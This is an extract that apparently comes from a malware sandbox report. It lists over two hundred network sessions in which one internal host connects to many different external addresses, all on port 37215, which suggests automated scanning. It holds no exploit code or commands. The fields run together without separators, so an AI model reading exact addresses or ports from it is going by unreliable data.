                                              21012192.168.2.154873694.232.44.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21013192.168.2.1559190121.117.52.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21014192.168.2.1536600190.40.215.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21015192.168.2.1554828122.31.153.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21016192.168.2.1537090197.205.9.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21017192.168.2.155757441.216.69.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21018192.168.2.1534750181.205.42.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21019192.168.2.1543636102.166.247.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21020192.168.2.154166641.54.31.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21021192.168.2.1535728181.242.215.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21022192.168.2.1559100156.249.138.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21023192.168.2.1544288102.123.15.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21024192.168.2.1540212121.254.46.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21025192.168.2.155319045.148.211.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21026192.168.2.1554336121.254.101.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21027192.168.2.1550920138.235.94.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21028192.168.2.1554948190.239.21.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21029192.168.2.1542570181.84.171.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21030192.168.2.1534830197.141.91.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21031192.168.2.1558072222.164.40.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21032192.168.2.1559190197.102.253.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21033192.168.2.1559042222.122.81.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21034192.168.2.1556208210.112.114.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21035192.168.2.1556314102.71.34.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21036192.168.2.1533192157.23.61.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21037192.168.2.154737294.123.21.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21038192.168.2.1539742222.194.95.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21039192.168.2.1560170181.161.59.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21040192.168.2.153464431.11.1.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21041192.168.2.1533316138.237.4.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21042192.168.2.1542924138.200.59.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21043192.168.2.1535664197.142.174.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21044192.168.2.153570094.88.41.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21045192.168.2.154729837.8.26.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21046192.168.2.155022841.185.204.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21047192.168.2.1532846222.222.247.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21048192.168.2.1544452138.82.143.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21049192.168.2.154416894.254.45.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21050192.168.2.1558332102.31.61.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21051192.168.2.154119252.124.139.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21052192.168.2.1539998156.5.138.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21053192.168.2.154337645.144.126.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21054192.168.2.1536466222.131.205.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21055192.168.2.1543272138.98.224.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21056192.168.2.1557194156.31.182.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21057192.168.2.1549206156.153.47.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21058192.168.2.1560120121.142.199.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21059192.168.2.1538542181.164.93.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21060192.168.2.1546946204.118.207.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21061192.168.2.1559116102.75.72.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21062192.168.2.1535528181.120.140.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21063192.168.2.154826237.190.238.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21064192.168.2.1558126222.141.215.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21065192.168.2.1558132138.117.145.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21066192.168.2.154101031.30.144.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21067192.168.2.1547698190.175.10.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21068192.168.2.1559684197.159.107.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21069192.168.2.1555648186.200.200.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21070192.168.2.153871213.67.135.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21071192.168.2.1559042190.149.224.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21072192.168.2.1560500121.69.208.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21073192.168.2.154611245.204.11.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21074192.168.2.1542870222.2.26.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21075192.168.2.1539810181.177.252.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21076192.168.2.155183837.29.86.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21077192.168.2.154515494.204.123.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21078192.168.2.155203031.22.204.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21079192.168.2.1537192157.137.25.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21080192.168.2.1552466102.14.196.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21081192.168.2.153906045.86.186.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21082192.168.2.1557552190.38.211.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21083192.168.2.1553048191.209.200.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21084192.168.2.1553280157.13.212.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21085192.168.2.1533714157.163.87.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21086192.168.2.1535368190.143.233.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21087192.168.2.1558970190.208.204.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21088192.168.2.155822045.115.126.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21089192.168.2.1533860122.82.38.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21090192.168.2.155570837.154.177.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21091192.168.2.154921637.85.254.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21092192.168.2.1532860186.183.20.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21093192.168.2.1542630138.82.237.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21094192.168.2.155950294.208.145.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21095192.168.2.154230431.211.80.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21096192.168.2.1533924138.4.57.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21097192.168.2.1536470157.39.170.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21098192.168.2.1543052138.199.136.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21099192.168.2.155328831.38.157.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21100192.168.2.1546968121.240.144.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21101192.168.2.154816445.20.203.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21102192.168.2.1544358190.46.87.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21103192.168.2.1536120156.239.35.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21104192.168.2.1554304197.70.8.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21105192.168.2.1551082197.126.93.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21106192.168.2.1560998121.8.254.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21107192.168.2.1558854190.119.93.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21108192.168.2.155915231.242.50.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21109192.168.2.1557236197.159.108.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21110192.168.2.1550600190.207.10.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21111192.168.2.155567637.253.152.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21112192.168.2.154287431.39.191.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21113192.168.2.1556228121.120.105.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21114192.168.2.1554058186.152.120.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21115192.168.2.1545698181.134.234.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21116192.168.2.1554354102.97.207.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21117192.168.2.1533790190.96.113.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21118192.168.2.1558182121.214.93.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21119192.168.2.155440045.180.203.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21120192.168.2.1533296157.211.1.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21121192.168.2.1554712102.227.10.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21122192.168.2.1533442181.83.54.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21123192.168.2.153718641.194.195.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21124192.168.2.1558788157.210.89.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21125192.168.2.153699894.210.7.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21126192.168.2.1556922121.20.158.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21127192.168.2.1538528121.179.139.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21128192.168.2.1544516121.222.217.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21129192.168.2.1542542156.184.204.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21130192.168.2.1559700186.105.39.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21131192.168.2.154139857.90.111.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21132192.168.2.1551312156.2.89.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21133192.168.2.1558006141.189.135.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21134192.168.2.153990845.136.216.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21135192.168.2.153531094.181.63.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21136192.168.2.1560248157.202.232.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21137192.168.2.155814031.5.234.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21138192.168.2.1537340186.57.58.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21139192.168.2.154016045.163.27.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21140192.168.2.1554240157.213.206.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21141192.168.2.1540072186.178.255.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21142192.168.2.1539950102.63.181.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21143192.168.2.1549366156.93.126.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21144192.168.2.153811041.241.144.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21145192.168.2.1537958156.22.162.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21146192.168.2.153372437.79.30.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21147192.168.2.1534178156.232.190.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21148192.168.2.1535680197.6.110.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21149192.168.2.1538710156.224.33.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21150192.168.2.1554520222.128.216.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21151192.168.2.154737237.100.136.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21152192.168.2.154410241.86.17.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21153192.168.2.154479237.211.16.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21154192.168.2.1555168121.145.45.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21155192.168.2.1542506156.239.223.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21156192.168.2.1558570222.210.93.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21157192.168.2.1537842156.229.95.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21158192.168.2.1549584138.59.91.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21159192.168.2.154934241.118.203.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21160192.168.2.1556480102.133.61.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21161192.168.2.1546532157.231.57.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21162192.168.2.1536702122.132.175.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21163192.168.2.154556645.103.241.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21164192.168.2.154332237.86.5.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21165192.168.2.1552664222.38.79.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21166192.168.2.1550848197.205.90.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21167192.168.2.1538178138.200.126.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21168192.168.2.1556546130.26.243.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21169192.168.2.153584837.179.126.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21170192.168.2.1558524102.1.227.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21171192.168.2.1548322174.214.216.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21172192.168.2.1552684156.133.104.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21173192.168.2.154963831.106.5.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21174192.168.2.1559010181.116.16.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21175192.168.2.1559404157.111.187.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21176192.168.2.1560602122.181.123.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21177192.168.2.1540870104.58.64.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21178192.168.2.1555442190.152.49.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21179192.168.2.1537948190.149.201.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21180192.168.2.1547930186.236.207.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21181192.168.2.1556904102.15.246.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21182192.168.2.1536202197.215.97.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21183192.168.2.155056437.50.101.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21184192.168.2.1543324222.45.84.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21185192.168.2.1552412151.97.11.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21186192.168.2.1541692102.14.87.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21187192.168.2.1558376122.34.171.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21188192.168.2.1534772186.3.177.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21189192.168.2.154700045.104.11.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21190192.168.2.154999645.180.215.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21191192.168.2.1545112197.150.87.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21192192.168.2.1545602186.208.118.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21193192.168.2.1551160197.28.45.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21194192.168.2.155139431.212.93.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21195192.168.2.1547576181.55.156.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21196192.168.2.1532858156.91.110.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21197192.168.2.156097237.128.94.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21198192.168.2.154245641.98.191.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21199192.168.2.1549140157.21.91.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21200192.168.2.153442863.85.46.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21201192.168.2.1534638181.19.71.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21202192.168.2.154774045.185.151.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21203192.168.2.1549170222.91.210.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21204192.168.2.1559878109.33.25.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21205192.168.2.1545328197.175.37.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21206192.168.2.1534446190.205.226.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21207192.168.2.15572182.214.57.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21208192.168.2.155276094.65.130.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21209192.168.2.1541812197.156.68.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21210192.168.2.1541682156.140.67.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21211192.168.2.1538064138.78.202.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21212192.168.2.1554834190.223.94.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21213192.168.2.1543274121.140.197.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21214192.168.2.154392645.158.62.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21215192.168.2.1536778138.75.37.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21216192.168.2.1546224101.16.180.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21217192.168.2.1537988181.238.173.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21218192.168.2.153392837.76.102.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21219192.168.2.1556396223.131.220.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21220192.168.2.1549250190.225.141.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21221192.168.2.1559362133.86.82.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21222192.168.2.153475045.59.181.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21223192.168.2.1533308157.189.78.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21224192.168.2.155404063.74.194.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21225192.168.2.1542618222.244.18.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21226192.168.2.154462641.34.109.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21227192.168.2.1537934222.248.46.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21228192.168.2.1547166157.177.50.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21229192.168.2.1555426190.14.47.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21230192.168.2.155444437.120.81.14737215
